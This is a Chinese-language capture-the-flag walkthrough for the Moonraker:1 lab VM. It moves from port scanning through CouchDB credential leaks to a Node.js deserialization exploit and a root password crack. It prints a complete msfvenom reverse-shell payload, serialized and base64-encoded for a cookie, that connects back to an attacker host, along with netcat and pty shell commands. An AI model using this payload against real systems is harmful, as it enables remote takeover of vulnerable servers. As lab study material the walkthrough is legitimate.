0x01 前言
攻擊Moonraker系統並且找出存在最大的威脅漏洞,通過最大威脅漏洞攻擊目標靶機系統並進行提權獲取系統中root目錄下的flag信息。
Moonraker: 1鏡像下載地址:
http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA
0x02 信息收集
1.存活主機掃描
root@kali2018:/# arp-scan -l
發現192.168.1.10是目標靶機系統
2.端口掃描
namp掃描目標靶機端口
root@kali2018:~# nmap -p - -A 192.168.1.10 --open Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST Nmap scan report for 192.168.1.10 Host is up (0.00077s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0) | ssh-hostkey: | 2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA) | 256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA) |_ 256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519) 80/tcp open httpApache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.25 (Debian) |_http-title: MOONRAKER 3000/tcp open httpNode.js Express framework | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=401 |_http-title: Site doesn't have a title (text/html; charset=utf-8). 4369/tcp open epmdErlang Port Mapper Daemon | epmd-info: | epmd_port: 4369 | nodes: |_ couchdb: 33681 5984/tcp open couchdb? | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Object Not Found | Cache-Control: must-revalidate | Connection: close | Content-Length: 58 | Content-Type: application/json | Date: Mon, 11 Feb 2019 21:22:55 GMT | Server: CouchDB/2.2.0 (Erlang OTP/19) | X-Couch-Request-ID: bf092a958f | X-CouchDB-Body-Time: 0 | {"error":"not_found","reason":"Database does not exist."} | GetRequest: | HTTP/1.0 200 OK | Cache-Control: must-revalidate | Connection: close | Content-Length: 164 | Content-Type: application/json | Date: Mon, 11 Feb 2019 21:22:02 GMT | Server: CouchDB/2.2.0 (Erlang OTP/19) | X-Couch-Request-ID: f038a56575 | X-CouchDB-Body-Time: 0 |{"couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{"name":"The Apache Software Foundation"}} | HTTPOptions: | HTTP/1.0 500 Internal Server Error | Cache-Control: must-revalidate | Connection: close | Content-Length: 61 | Content-Type: application/json | Date: Mon, 11 Feb 2019 21:22:02 GMT | Server: CouchDB/2.2.0 (Erlang OTP/19) | X-Couch-Request-ID: fdeb1a3860 | X-Couch-Stack-Hash: 1828508689 | X-CouchDB-Body-Time: 0 |_{"error":"unknown_error","reason":"badarg","ref":1828508689}
NMAP掃描輸出顯示開放端口服務:22(ssh),80(http),110(pop3),3000(node.js),4369(epmd),5984(couchdb)
3.目錄掃描
我比較喜歡gobuster和DirBuster來進行目錄掃描,這里我用gobuster進行目標目錄掃描。
在掃描完成后,發現一個可疑的目錄為/services
打開該目錄的鏈接地址http://192.168.1.10/services/,可以在網頁底部看到SEND AN INIRIRY的超級鏈接,然后打開超鏈接。
打開鏈接后顯示了一個售后聯系信息頁面。注意到有人會查詢我們提交的信息,並會在5分鍾內與我們聯系。
這里我們使用<img>標簽嵌套了我的遠程服務網站地址。(只要對方訪問了該嵌套xss,遠端服務器的日志就會被記錄訪問請求日志記錄)
apache啟動
在提交信息前,啟動apache服務,並在/var/www/html目錄下新建一個測試文件test.txt,內容隨便寫一個。
root@kali2018:~# /etc/init.d/apache2 start [ ok ] Starting apache2 (via systemctl): apache2.service. root@kali2018:~# cd /var/www root@kali2018:/var/www# ls html root@kali2018:/var/www# cd html/ root@kali2018:/var/www/html# ls index.html index.nginx-debian.html root@kali2018:/var/www/html# vi test.txt root@kali2018:/var/www/html#
測試apache服務器能正常訪問
隨后可以通過apache2 access.log可以查看到訪問目標靶機網站日志記錄。點擊提交后,它已顯示感謝您的提交消息,如下圖所示。
通過命令查看apache訪問日志
tail -f /var/log/apache2/access.log
可以發現日志中有一個有趣的http refefer地址:http://192.168.1.10/svc-inq/salesmoon-gui.php
0x03 漏洞利用
1.CouchDB信息收集
我們在瀏覽器中打開http refefer請求地址
然后顯示出"返回銷售管理后台"的超鏈接,點擊可進入到銷售后台管理登錄頁面。
接下來我們點擊CouchDB Notes並得到一些關於用戶名的密碼的提示:
用戶名:jaws ,密碼:jaws女友名字+ x99
在這里,我們谷歌搜索Jaws' girlfriend
已獲取到Fauxton系統中Apache CouchDB的用戶名和密碼。要了解有關Fauxton和CouchDB的更多信息,我們可以通過googel搜索它們的使用方法(http://docs.couchdb.org/en/stable/fauxton/install.html).
2.CouchDB登錄及信息泄露
由於端口5984是開放的。可以打開CouchDB登錄頁面(192.168.1.10:5984/_utils/).
這里我們使用了Login Credentials,如下所示:
Username: jaws
Password: dollyx99
已成功登錄,現在讓我們查看這3個數據庫中的信息。
該links數據庫暴露出更多的信息
查看該鏈接數據庫中的文檔,因為每個文檔都包含目錄鏈接,但第三個目錄鏈接可能會為我們的下一步滲透提供有用的信息。
因此,我們打開第三個文檔的連接,並查看到有用的連接目錄信息。
所以上面的鏈接,在打開后顯示出一個人事辦公備忘記錄的信息(這里記錄幾個人的重要郵件信息)
可以看到郵件中泄露了用戶名和密碼
3.Node.js反序列化
這里打開http://192.168.1.10/raker-sales/后台管理頁面,發現“hugo's page moved to port 3k”頁面是有趣的(結合上面人事備忘記錄頁面中的hugo郵件信息)
打開該鏈接后,可看到有關node.js服務器和訪問的信息
用戶名和密碼在Hugo的HR郵件中http://192.168.1.10/HR-Confidential/offer-letters.html
顯示出登錄node.js的用戶名和密碼(通過3000端口訪問)
登錄后,node.js服務器會發送“Set-Cookie”信息。
Node.js反序列化漏洞相關信息可以參考該鏈接地址。
4.反序化漏洞利用
從NMAP Scan輸出,我們知道端口3000是Node.js框架應用。因此,我們在瀏覽器上打開目標IP的3000端口應用並彈出登錄用戶界面。
Username: hugo
Password: TempleLasersL2K
成功登錄后,我們會在頁面中顯示一條消息。這個頁面似乎毫無用處,但在花時間搞清楚下一步該做什么后,它變得非常有趣。
啟動F12查看頁面的請求信息。在Cookie中看到了base64編碼信息。這里我們將以base64編碼形式插入node.js反序列化漏洞。
使用msfvenom生成nodejs反彈shell
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.21 LPORT=1234
從終端輸出msfvenom到rce.js
rce.js:
var rev = { rce: function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); } }; var serialize = require('node-serialize'); console.log(serialize.serialize(rev));
運行node rce.js以獲取序列化字符串輸出。
root@kali2018:/opt# node rce.js {"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }"}
接下來,將IIFE括號()添加到上一步的序列化字符串輸出的末尾
{"rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }()"}
然后將其轉換成base64編碼
eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gXCJjbWRcIiA6IFwiL2Jpbi9zaFwiOyB2YXIgbmV0ID0gcmVxdWlyZShcIm5ldFwiKSwgY3AgPSByZXF1aXJlKFwiY2hpbGRfcHJvY2Vzc1wiKSwgdXRpbCA9IHJlcXVpcmUoXCJ1dGlsXCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCgxMjM0LCBcIjE5Mi4xNjguMS4yMVwiLCBmdW5jdGlvbigpIHsgY2xpZW50LnNvY2tldC5waXBlKHNoLnN0ZGluKTsgaWYgKHR5cGVvZiB1dGlsLnB1bXAgPT09IFwidW5kZWZpbmVkXCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbihcImVycm9yXCIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSgpIn0=
先登錄node.js后台,然后再刷新頁面,通過bupsuit進行攔截,將整個base64字符串設置為cookie中profile的值,替換完profile值后進行攔截提交,在者之前,您需要設置您的nc偵聽。
現在,我們在攻擊機上監聽netcat,然后通過python腳本進入交互shell界面:python -c 'import pty; pty.spawn("/bin/bash")'
root@kali2018:/opt# nc -lvvp 1234 listening on [any] 1234 ... 192.168.1.10: inverse host lookup failed: Unknown host connect to [192.168.1.21] from (UNKNOWN) [192.168.1.10] 46010 id uid=1001(jaws) gid=1001(jaws) groups=1001(jaws) python -c "import pty;pty.spawn('/bin/bash')" jaws@moonraker:/$
0x04 權限提升
在枚舉jaws帳戶期間,我注意到Postfix正在本地監聽25端口。
netstat -ano
我們進入目錄/var/mial中發現了四個郵箱賬號信息,但沒有權限訪問它們。
jaws@moonraker:~$ cd /var/mai jaws@moonraker:/var/mail$ ls -al total 96 drwxrwsr-x 2 root mail4096 Oct 14 10:25 . drwxr-xr-x 12 root root 4096 Sep 20 17:38 .. -rw------- 1 hugo mail2994 Oct 6 11:47 hugo -rw------- 1 moonrakertech mail 1478 Oct5 19:24 moonrakertech -rw------- 1 root mail 68975 Oct 6 11:40 root -rw------- 1 sales mail6342 Oct 14 10:25 sales
在了解了CouchDb的配置之后,我們發現CouchDb的默認安裝目錄是/opt/couchdb,從/etc/local.ini讀取配置文件。
讓我們查看local.ini中的配置內容
jaws@moonraker:/var/mail$tail /opt/couchdb/etc/local.ini Username: hugo Password: 321Blast0ff!! eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDUwLDU1LDQ2LDQ4LDQ2LDQ4LDQ2LDQ5LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUwLDUxLDUxLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==
有了hugo密碼,我登錄他的帳戶並閱讀他的郵件。
jaws@moonraker:/var/mail$ su hugo Password: 321Blast0ff! Mail version 8.1.2 01/15/2001. Type ? for help.
登錄hugo用戶后,然后讀取了其郵件信息,我們注意到Message 2很有趣,因為它包含root和哈希密碼,並且還告訴我們該密碼也在VROOM系統中使用。
jaws@moonraker:/var/mail$ mail "/var/mail/hugo": 3 messages 3 new >N 1 moonrakertech@moo Fri Oct5 19:11 17/842 RE:Root Access N2 moonrakertech@moo Fri Oct 5 19:3923/1351 RE:RE:RE:Root Access N3 hr@moonraker.loca Fri Oct 5 20:2417/801 Decompression Accident &
這里我們讀取郵件2的信息
>N 1 moonrakertech@moo Fri Oct5 19:11 17/842 RE:Root Access N2 moonrakertech@moo Fri Oct 5 19:3923/1351 RE:RE:RE:Root Access N3 hr@moonraker.loca Fri Oct 5 20:2417/801 Decompression Accident & 2 Message 2: From moonrakertech@moonraker.localdomainFri Oct 5 19:39:51 2018 X-Original-To: hugo@moonraker.localdomain To: hugo@moonraker.localdomain Subject: RE:RE:RE:Root Access MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Date: Fri, 5 Oct 2018 19:39:51 -0400 (EDT) From: moonrakertech@moonraker.localdomain Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk. Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes. Have fun with the decryption process "Boss"! Haha! root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::
這里顯示了root以及對應舊密碼的hash值
讓我們復制舊密碼哈希並通過John the Ripper進行離線破解
john root.hash
Username: root
Password: cyber
最終新的登錄密碼為:cyber+VR00M(cyberVR00M)
使用root身份登錄系統。
su root Password: cyberVR00M hugo@moonraker:/var/mail$ su root Password: cyberVR00M
0X05 flag信息查看
成功以root身份登錄,在檢查其郵件目錄時,我們找到了flag.txt文件。
root@moonraker:~# cd /root root@moonraker:~# ls coreDesktop Downloads flag.txt root@moonraker:~# cat flag.txt
